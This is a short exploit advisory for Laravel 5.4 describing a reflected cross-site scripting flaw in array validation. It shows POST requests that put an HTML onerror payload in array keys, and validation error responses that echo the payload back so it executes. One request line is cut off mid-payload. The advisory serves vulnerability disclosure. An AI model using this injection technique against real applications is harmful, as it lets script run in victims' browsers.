Laravel 5.4 Cross Site Scripting

Laravel version 5.4 suffers from a cross site scripting vulnerability.

MD5 | 22bf207f6f51f8b1b7a97295cc5db267

# Exploit Title: Laravel non-presistent XSS in validation of arrays
# Date: 06/03/2017
# Exploit Author: MaHDyfo (mahdyfof[the at sign]
# Vendor Homepage:
# Version: 5.4

In Laravel validation rules, assume that you set a rule to get an array input.

$this->validate($request, [
'lessons' => 'required|array',
'lessons.*' => 'numeric'

Here we say lessons should be array and the elements should be numeric.
Now let's enter a character there to fail the validation.

POST Request: lessons[]=1&lessons[]=4&lessons[]=abc

It tells {"lessons.2":["The lessons.2 must be a number."]}
That's OK up to here. But what if we place an index for the array.

POST Request: lessons[]=1&lessons[]=4&lessons[example]=abc
Response: {"lessons.example":["The lessons.example must be a number."]}

POST Request: lessons[]=1&lessons[]=4&lessons[<img src=x
Response: {"lessons.<img src=x onerror='alert(1)'>":["The lessons.<img
src=x onerror='alert(1)'> must be a number."]}
And it executes the alert with no problem...

You can see this bug already exists in Laravel official doc:
Maybe the solution is to validate the array values yourself by for
example extending validation rules.


Related Posts